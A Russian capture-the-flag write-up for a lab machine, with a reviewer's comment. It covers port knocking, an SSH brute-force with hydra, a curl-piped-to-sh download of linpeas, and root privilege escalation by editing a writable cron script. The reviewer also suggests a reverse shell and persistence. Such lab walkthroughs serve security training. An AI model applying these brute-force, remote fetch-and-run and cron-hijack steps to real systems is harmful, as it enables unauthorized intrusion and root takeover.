Writeup Кто там? writeup

[r0dd9]

Прямая ссылка на задание

1. Port knocking: 2002 → 2003 → 2006 открыл SSH.
2. Получил доступ к пользователю Sergey2006.
3. Нашёл user.txt → начало флага.
4. Увидел, что test.py и rev.py запускаются из cron от root.
5. Модифицировал rev.py, чтобы он прочитал /root/root.txt.
6. Получил вторую часть флага.

Цель​

Сервер 192.168.2.204:
Разведка цели

nmap

nmap -sS 192.168.2.204

SYN-сканирование (полуоткрытое) По умолчанию. Быстро, тихо, не логируется на многих системах.

TCP SYN scan находит 22 порт и 80 порт
→ SSH не открыт напрямую, но помечен как filtered. - запомним.

- Прверим robots.txt

curl http://192.168.2.204/robots.txt

- Просканируем так-же директории сайта dirsearch на наличие открытого контента.

CGI-скрипты открыты и исполняются
Что такое cgi-bin?
Каталог, где размещаются CGI-скрипты (обычно на Perl, Python, Shell).
Если они доступны извне — могут позволить выполнение команд на сервере.
Особенно опасны, если скрипты обрабатывают входные данные без фильтрации → RCE (Remote Code Execution).

- Изучив HTML главной страницы находим подсказку

Это прямая отсылка к технике "Port Knocking" («стук в порты»).
Что такое Port Knocking?

Port Knocking — это скрытый механизм аутентификации:

• Определённые порты изначально закрыты или фильтруются.
• Только после подключения к портам в определённой последовательности — например, 1000 → 2000 → 3000 — открывается нужный порт (например, SSH на 22).
• Если не знать последовательность — порт остаётся недоступным.

Это как «пароль из стуков»: тук-тук-тук — и дверь открывается.

Выбираем вектор атаки​

Этап 1: Port Knocking

Что делать дальше?

Шаг 1: Найти последовательность «стуков»​

Где может быть указана последовательность?
Изучим сайт.

• В именах авторов: Nikita2002, Petya2003, Sergey2006
• В годах: 2002, 2003, 2006

Возможно, последовательность портов — это:

2002 → 2003 → 2006

или

2006 → 2003 → 2002

Шаг 2: Выполнить port knocking​

Используем nmap. Цель — просто «стукнуть» в порт, и добавим задержку между стуками sleep 1.

nmap -p 2002 192.168.2.204 && sleep 1 && nmap -p 2003 192.168.2.204 && sleep 1 && nmap -p 2006 192.168.2.204

→ nmap открывает SSH на 22 порту.

Этап 2: Вход по SSH​

Порт открылся но мы не знаем логина и пароля для входа по ssh.

Исходя из анализа сайта, предположим что логин это имя автора а пароль это год, составим словарь для брута ssh.
Из того что нам известно Nikita2002, Petya2003, Sergey2006 напишем скрипт для генерации возможных комбинаций пары логин пароль.

gedit gen_dict.sh

#!/bin/bash
items=(
  "Nikita2002" "Petya2003" "Sergey2006"
  "Nikita" "2002" "Petya" "2003" "Sergey" "2006"
  "nikita2002" "Nikita_2002" "Nikita-2002" "2002Nikita"
  "petya2003" "Petya_2003" "Petya-2003" "2003Petya"
  "sergey2006" "Sergey_2006" "Sergey-2006" "2006Sergey"
)

> login_pass.txt
for u in "${items[@]}"; do
  for p in "${items[@]}"; do
    echo "$u:$p"
  done
done

Дадим скрипту права на выполнение.

chmod +x gen_dict.sh

И запустим для генерации словаря.

./gen_dict.sh

Подкинем словарь в hydra через -C в 4 потока.

hydra -C login_pass.txt ssh://192.168.2.204 -t 4 -f -V

-C login_pass.txt Использует словарь в формате loginassword
ssh://192.168.2.204 Цель: SSH на указанном IP
-t 4 4 параллельных соединения (чтобы не перегрузить и не заблокироваться)
-f Остановиться после первого успеха (как только найдёт пароль)
-V Подробный вывод — показывает, какая пара проверяется

Брут не дал результата.

Попробуем пробрутить логины Nikita2002, Petya2003, Sergey2006 по стандартным словарям из SecList.

Брут дал результат.

Входим на сервер по shh
Осмотримся что тут есть.

На серве в учетке Сергея находим первую часть флага.

Этап 3: Первичная разведка сервера​

Мы внутри. Ищем вторую часть флага.
Скорее всего нужно искать в папке root.
Автоматизируем разведку внутри сервера с помошью LeanPeass.
LinPEAS — это скрипт, который ищет возможные пути повышения привилегий на хостах Linux/Unix*/MacOS.

whoisthere:~$ curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

LinPEAS находит и подсвечивает возможный вектор развития в скомпрометированной системе, это планировщик cron.

по матрицае MITRE ATT&CK это недостатки разрешений для файлов служб.

Матрица MITRE ATT&CK

mitre.ptsecurity.com

Посмотрим все запущенные процессы в системе, и отфильтруем их по python и cron.

ps aux | grep -i "python\|cron"

Найдено:

• /home/Sergey2006/user.txt → CODEBY{перваячастьфлага
• /bin/bbsuid — SUID-root бинарник (не удалось эксплуатировать)
• test.py, rev.py — Python-скрипты
• Cron запускает test.py и rev.py от root

Этап 4: Эскалация через cron​

Изменим rev.py:

import os os.system("cat /root/root.txt > /tmp/final_flag.txt 2>&1") os.system("chmod 666 /tmp/final_flag.txt")

Через 1–2 минуты:

cat /tmp/final_flag.txt

CTF решен!

Использованные уязвимости​

Port Knocking Неочевидный способ открытия SSH — защита "по знанию"
Writable cron-executed script Возможность модифицировать скрипт, запускаемый от root
Lack of input validation Скрипты выполняются без проверки целостности

🛡 Рекомендации по защите​

1. Ограничить права на скрипты в cron — только для root.
2. Запретить запись в /home/*/ для критических скриптов.
3. Запретить выполнение, использовать noexec на /tmp.
4. Настройте мониторинг изменений в файлах.
5. Отключить SUID для сторонних бинарников.
6. Настройте логирование. Вести логирование вывода cron-задач для отслеживания подозрительной активности.

---

Инструменты: nmap, ssh, cat, ps, cron, python, linpeas, dirsearch

 

[Сергей Попов]

Флаг берут многие, разбор пишут единицы - CTF держится именно на разборах. Спасибо!

Три вещи на будущее:

1. Пароль. Ты собрал словарь из имён и годов, а зашёл 123456 - топ-1 rockyou. Это закономерность, а не везение: дефолты и топовые пароли закрывают большинство SSH раньше, чем вообще имеет смысл городить таргетный словарь. Порядок: сначала rockyou / дефолты вендора, кастом потом. Тег машины «Creds Reuse» ровно об этом.
2. В разборе остался заход через robots.txt и dirsearch, который никуда не вёл. Тупики в процессе норма, но в финальном тексте держи одну чистую линию атаки: что сработало и почему. Остальное сворачивается в строку «проверил, пусто». Читатель видит логику решения, а не лог всех попыток.
3. Эскалацию ты сделал через os.system("cat /root/root.txt") это один выстрел. Cron крутит твой скрипт от root, так что закладывай туда полноценный reverse shell, а не одну команду: на выходе живая root-сессия и постэксплуатация (разведка, соседние сервисы, персистентность), а не текст одного флага. На лёгкой задаче не страшно, на сложной это тупик.

Жду следующие разборы. Дальше задания злее